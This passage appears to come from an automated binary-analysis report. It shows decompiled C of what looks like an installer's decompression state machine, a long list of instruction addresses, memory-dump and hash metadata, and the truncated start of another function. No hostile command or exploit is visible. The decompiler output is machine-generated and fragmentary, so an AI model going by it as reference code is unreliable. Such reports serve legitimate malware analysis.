														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                        0x00000000
                                                                                        0x004064ee
                                                                                        0x004064ee
                                                                                        0x004064f2
                                                                                        0x004064ff
                                                                                        0x00406509
                                                                                        0x00000000
                                                                                        0x004064f4
                                                                                        0x004064f4
                                                                                        0x0040652f
                                                                                        0x00406532
                                                                                        0x00406535
                                                                                        0x00406538
                                                                                        0x00406538
                                                                                        0x0040653b
                                                                                        0x00406542
                                                                                        0x00406547
                                                                                        0x00406428
                                                                                        0x0040642b
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067ee
                                                                                        0x004067f2
                                                                                        0x004069a1
                                                                                        0x004069b7
                                                                                        0x004069bf
                                                                                        0x004069c6
                                                                                        0x004069c8
                                                                                        0x004069cf
                                                                                        0x004069d3
                                                                                        0x004069d3
                                                                                        0x004067fe
                                                                                        0x00406805
                                                                                        0x0040680d
                                                                                        0x00406810
                                                                                        0x00406813
                                                                                        0x00406813
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fb5
                                                                                        0x00405fbe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x00000000
                                                                                        0x00405fcf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fd8
                                                                                        0x00405fdb
                                                                                        0x00405fde
                                                                                        0x00405fe2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fe8
                                                                                        0x00405feb
                                                                                        0x00405fed
                                                                                        0x00405fee
                                                                                        0x00405ff1
                                                                                        0x00405ff3
                                                                                        0x00405ff4
                                                                                        0x00405ff6
                                                                                        0x00405ff9
                                                                                        0x00405ffe
                                                                                        0x00406003
                                                                                        0x0040600c
                                                                                        0x0040601f
                                                                                        0x00406022
                                                                                        0x0040602e
                                                                                        0x00406056
                                                                                        0x00406058
                                                                                        0x00406066
                                                                                        0x00406066
                                                                                        0x0040606a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x0040605a
                                                                                        0x0040605d
                                                                                        0x0040605e
                                                                                        0x0040605e
                                                                                        0x00000000
                                                                                        0x0040605a
                                                                                        0x00406034
                                                                                        0x00406039
                                                                                        0x00406039
                                                                                        0x00406042
                                                                                        0x0040604a
                                                                                        0x0040604d
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406053
                                                                                        0x00000000
                                                                                        0x00406070
                                                                                        0x00406070
                                                                                        0x00406074
                                                                                        0x00406920
                                                                                        0x00000000
                                                                                        0x00406920
                                                                                        0x0040607d
                                                                                        0x0040608d
                                                                                        0x00406090
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406093
                                                                                        0x00406096
                                                                                        0x0040609a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040609c
                                                                                        0x004060a2
                                                                                        0x004060cc
                                                                                        0x004060d2
                                                                                        0x004060d9
                                                                                        0x00000000
                                                                                        0x004060d9
                                                                                        0x004060a8
                                                                                        0x004060ab
                                                                                        0x004060b0
                                                                                        0x004060b0
                                                                                        0x004060bb
                                                                                        0x004060c3
                                                                                        0x004060c6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040610b
                                                                                        0x00406111
                                                                                        0x00406114
                                                                                        0x00406121
                                                                                        0x00406129
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004060e0
                                                                                        0x004060e0
                                                                                        0x004060e4
                                                                                        0x0040692f
                                                                                        0x00000000
                                                                                        0x0040692f
                                                                                        0x004060f0
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fb
                                                                                        0x004060fe
                                                                                        0x00406101
                                                                                        0x00406104
                                                                                        0x00406109
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067a0
                                                                                        0x004067a0
                                                                                        0x004067a6
                                                                                        0x004067ac
                                                                                        0x004067b2
                                                                                        0x004067cc
                                                                                        0x004067cf
                                                                                        0x004067d5
                                                                                        0x004067e0
                                                                                        0x004067e2
                                                                                        0x004067b4
                                                                                        0x004067b4
                                                                                        0x004067c3
                                                                                        0x004067c7
                                                                                        0x004067c7
                                                                                        0x004067ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406131
                                                                                        0x00406133
                                                                                        0x00406136
                                                                                        0x004061a7
                                                                                        0x004061aa
                                                                                        0x004061ad
                                                                                        0x004061b4
                                                                                        0x004061be
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00406138
                                                                                        0x0040613c
                                                                                        0x0040613f
                                                                                        0x00406141
                                                                                        0x00406144
                                                                                        0x00406147
                                                                                        0x00406149
                                                                                        0x0040614c
                                                                                        0x0040614e
                                                                                        0x00406153
                                                                                        0x00406156
                                                                                        0x00406159
                                                                                        0x0040615d
                                                                                        0x00406164
                                                                                        0x00406167
                                                                                        0x0040616e
                                                                                        0x00406172
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x0040617a
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406174
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x00406169
                                                                                        0x0040617e
                                                                                        0x00406181
                                                                                        0x0040619f
                                                                                        0x004061a1
                                                                                        0x00000000
                                                                                        0x00406183
                                                                                        0x00406183
                                                                                        0x00406186
                                                                                        0x00406189
                                                                                        0x0040618c
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x0040618e
                                                                                        0x00406191
                                                                                        0x00406194
                                                                                        0x00406196
                                                                                        0x00406197
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x0040619a
                                                                                        0x00000000
                                                                                        0x004063d0
                                                                                        0x004063d4
                                                                                        0x004063f2
                                                                                        0x004063f5
                                                                                        0x004063fc
                                                                                        0x004063ff
                                                                                        0x00406402
                                                                                        0x00406405
                                                                                        0x00406408
                                                                                        0x0040640b
                                                                                        0x0040640d
                                                                                        0x00406414
                                                                                        0x00406415
                                                                                        0x00406417
                                                                                        0x0040641a
                                                                                        0x0040641d
                                                                                        0x00406420
                                                                                        0x00406420
                                                                                        0x00406425
                                                                                        0x00000000
                                                                                        0x00406425
                                                                                        0x004063d6
                                                                                        0x004063d9
                                                                                        0x004063dc
                                                                                        0x004063e6
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040643a
                                                                                        0x0040643e
                                                                                        0x00406461
                                                                                        0x00406464
                                                                                        0x00406467
                                                                                        0x00406471
                                                                                        0x00406440
                                                                                        0x00406440
                                                                                        0x00406443
                                                                                        0x00406446
                                                                                        0x00406449
                                                                                        0x00406456
                                                                                        0x00406459
                                                                                        0x00406459
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040647d
                                                                                        0x00406481
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406487
                                                                                        0x0040648b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406491
                                                                                        0x00406493
                                                                                        0x00406497
                                                                                        0x00406497
                                                                                        0x0040649a
                                                                                        0x0040649e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406515
                                                                                        0x00406519
                                                                                        0x00406520
                                                                                        0x00406523
                                                                                        0x00406526
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x0040651b
                                                                                        0x00406529
                                                                                        0x0040652c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065d5
                                                                                        0x004065d5
                                                                                        0x004065d9
                                                                                        0x00406977
                                                                                        0x00000000
                                                                                        0x00406977
                                                                                        0x004065df
                                                                                        0x004065e2
                                                                                        0x004065e5
                                                                                        0x004065e9
                                                                                        0x004065ec
                                                                                        0x004065f2
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f4
                                                                                        0x004065f7
                                                                                        0x004065fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061ca
                                                                                        0x004061ca
                                                                                        0x004061ce
                                                                                        0x0040693b
                                                                                        0x00000000
                                                                                        0x0040693b
                                                                                        0x004061d4
                                                                                        0x004061d7
                                                                                        0x004061da
                                                                                        0x004061de
                                                                                        0x004061e1
                                                                                        0x004061e7
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061e9
                                                                                        0x004061ec
                                                                                        0x004061ef
                                                                                        0x004061ef
                                                                                        0x004061f2
                                                                                        0x004061f5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061fb
                                                                                        0x00406201
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406207
                                                                                        0x00406207
                                                                                        0x0040620b
                                                                                        0x0040620e
                                                                                        0x00406211
                                                                                        0x00406214
                                                                                        0x00406217
                                                                                        0x00406218
                                                                                        0x0040621b
                                                                                        0x0040621d
                                                                                        0x00406223
                                                                                        0x00406226
                                                                                        0x00406229
                                                                                        0x0040622c
                                                                                        0x0040622f
                                                                                        0x00406232
                                                                                        0x00406235
                                                                                        0x00406251
                                                                                        0x00406254
                                                                                        0x00406257
                                                                                        0x0040625a
                                                                                        0x00406261
                                                                                        0x00406265
                                                                                        0x00406267
                                                                                        0x0040626b
                                                                                        0x00406237
                                                                                        0x00406237
                                                                                        0x0040623b
                                                                                        0x00406243
                                                                                        0x00406248
                                                                                        0x0040624a
                                                                                        0x0040624c
                                                                                        0x0040624c
                                                                                        0x0040626e
                                                                                        0x00406275
                                                                                        0x00406278
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x0040627e
                                                                                        0x00000000
                                                                                        0x00406283
                                                                                        0x00406283
                                                                                        0x00406287
                                                                                        0x00406947
                                                                                        0x00000000
                                                                                        0x00406947
                                                                                        0x0040628d
                                                                                        0x00406290
                                                                                        0x00406293
                                                                                        0x00406297
                                                                                        0x0040629a
                                                                                        0x004062a0
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a2
                                                                                        0x004062a5
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062a8
                                                                                        0x004062ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004062b0
                                                                                        0x004062b3
                                                                                        0x004062b6
                                                                                        0x004062b9
                                                                                        0x004062bc
                                                                                        0x004062bf
                                                                                        0x004062c2
                                                                                        0x004062c5
                                                                                        0x004062c8
                                                                                        0x004062cb
                                                                                        0x004062ce
                                                                                        0x004062e6
                                                                                        0x004062e9
                                                                                        0x004062ec
                                                                                        0x004062ef
                                                                                        0x004062ef
                                                                                        0x004062f2
                                                                                        0x004062f6
                                                                                        0x004062f8
                                                                                        0x004062d0
                                                                                        0x004062d0
                                                                                        0x004062d8
                                                                                        0x004062dd
                                                                                        0x004062df
                                                                                        0x004062e1
                                                                                        0x004062e1
                                                                                        0x004062fb
                                                                                        0x00406302
                                                                                        0x00406305
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00000000
                                                                                        0x00406307
                                                                                        0x00406305
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x0040630c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406347
                                                                                        0x00406347
                                                                                        0x0040634b
                                                                                        0x00406953
                                                                                        0x00000000
                                                                                        0x00406953
                                                                                        0x00406351
                                                                                        0x00406354
                                                                                        0x00406357
                                                                                        0x0040635b
                                                                                        0x0040635e
                                                                                        0x00406364
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406366
                                                                                        0x00406369
                                                                                        0x0040636c
                                                                                        0x0040636c
                                                                                        0x00406372
                                                                                        0x00406310
                                                                                        0x00406310
                                                                                        0x00406313
                                                                                        0x00000000
                                                                                        0x00406313
                                                                                        0x00406374
                                                                                        0x00406374
                                                                                        0x00406377
                                                                                        0x0040637a
                                                                                        0x0040637d
                                                                                        0x00406380
                                                                                        0x00406383
                                                                                        0x00406386
                                                                                        0x00406389
                                                                                        0x0040638c
                                                                                        0x0040638f
                                                                                        0x00406392
                                                                                        0x004063aa
                                                                                        0x004063ad
                                                                                        0x004063b0
                                                                                        0x004063b3
                                                                                        0x004063b3
                                                                                        0x004063b6
                                                                                        0x004063ba
                                                                                        0x004063bc
                                                                                        0x00406394
                                                                                        0x00406394
                                                                                        0x0040639c
                                                                                        0x004063a1
                                                                                        0x004063a3
                                                                                        0x004063a5
                                                                                        0x004063a5
                                                                                        0x004063bf
                                                                                        0x004063c6
                                                                                        0x004063c9
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x004063cb
                                                                                        0x00000000
                                                                                        0x00406658
                                                                                        0x00406658
                                                                                        0x0040665c
                                                                                        0x00406983
                                                                                        0x00000000
                                                                                        0x00406983
                                                                                        0x00406662
                                                                                        0x00406665
                                                                                        0x00406668
                                                                                        0x0040666c
                                                                                        0x0040666f
                                                                                        0x00406675
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x00406677
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406767
                                                                                        0x0040676b
                                                                                        0x0040678d
                                                                                        0x00406790
                                                                                        0x0040679a
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x0040679d
                                                                                        0x0040679d
                                                                                        0x0040676d
                                                                                        0x00406770
                                                                                        0x00406774
                                                                                        0x00406777
                                                                                        0x00406777
                                                                                        0x0040677a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406824
                                                                                        0x00406828
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x00406846
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x0040685b
                                                                                        0x0040685b
                                                                                        0x00000000
                                                                                        0x0040685b
                                                                                        0x0040682a
                                                                                        0x0040682d
                                                                                        0x00406830
                                                                                        0x00406833
                                                                                        0x0040683a
                                                                                        0x0040677e
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406566
                                                                                        0x00406569
                                                                                        0x0040656c
                                                                                        0x0040656e
                                                                                        0x00406570
                                                                                        0x00406570
                                                                                        0x00406571
                                                                                        0x00406574
                                                                                        0x0040657b
                                                                                        0x0040657e
                                                                                        0x0040658c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406871
                                                                                        0x00406871
                                                                                        0x00406875
                                                                                        0x004069ad
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x0040687b
                                                                                        0x0040687e
                                                                                        0x00406881
                                                                                        0x00406885
                                                                                        0x00406888
                                                                                        0x0040688e
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406893
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406899
                                                                                        0x00406899
                                                                                        0x0040689d
                                                                                        0x004068fd
                                                                                        0x00406900
                                                                                        0x00406905
                                                                                        0x00406906
                                                                                        0x00406908
                                                                                        0x0040690a
                                                                                        0x0040690d
                                                                                        0x00406819
                                                                                        0x00406819
                                                                                        0x00000000
                                                                                        0x0040681f
                                                                                        0x00406819
                                                                                        0x0040689f
                                                                                        0x004068a5
                                                                                        0x004068a8
                                                                                        0x004068ab
                                                                                        0x004068ae
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b7
                                                                                        0x004068ba
                                                                                        0x004068bd
                                                                                        0x004068c0
                                                                                        0x004068d9
                                                                                        0x004068dc
                                                                                        0x004068df
                                                                                        0x004068e2
                                                                                        0x004068e6
                                                                                        0x004068e8
                                                                                        0x004068e8
                                                                                        0x004068e9
                                                                                        0x004068ec
                                                                                        0x004068c2
                                                                                        0x004068c2
                                                                                        0x004068ca
                                                                                        0x004068cf
                                                                                        0x004068d1
                                                                                        0x004068d4
                                                                                        0x004068d4
                                                                                        0x004068ef
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406316
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004064a1
                                                                                        0x004064a1
                                                                                        0x004064a5
                                                                                        0x0040696b
                                                                                        0x00000000
                                                                                        0x0040696b
                                                                                        0x004064ab
                                                                                        0x004064ae
                                                                                        0x004064b1
                                                                                        0x004064b4
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b6
                                                                                        0x004064b9
                                                                                        0x004064bc
                                                                                        0x004064bf
                                                                                        0x004064c2
                                                                                        0x004064c5
                                                                                        0x004064c8
                                                                                        0x004064c9
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064cb
                                                                                        0x004064ce
                                                                                        0x004064d1
                                                                                        0x004064d4
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064d7
                                                                                        0x004064da
                                                                                        0x004064dc
                                                                                        0x004064dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x004064df
                                                                                        0x004064df
                                                                                        0x00000000
                                                                                        0x004064df
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4
                                                                                        0x004069cc
                                                                                        0x004069cc
                                                                                        0x00000000
                                                                                        0x004069cc
                                                                                        0x00406819
                                                                                        0x004067a0
                                                                                        0x0040679d
                                                                                        0x00000000
                                                                                        0x004064f2

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                        • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                        • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                        • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
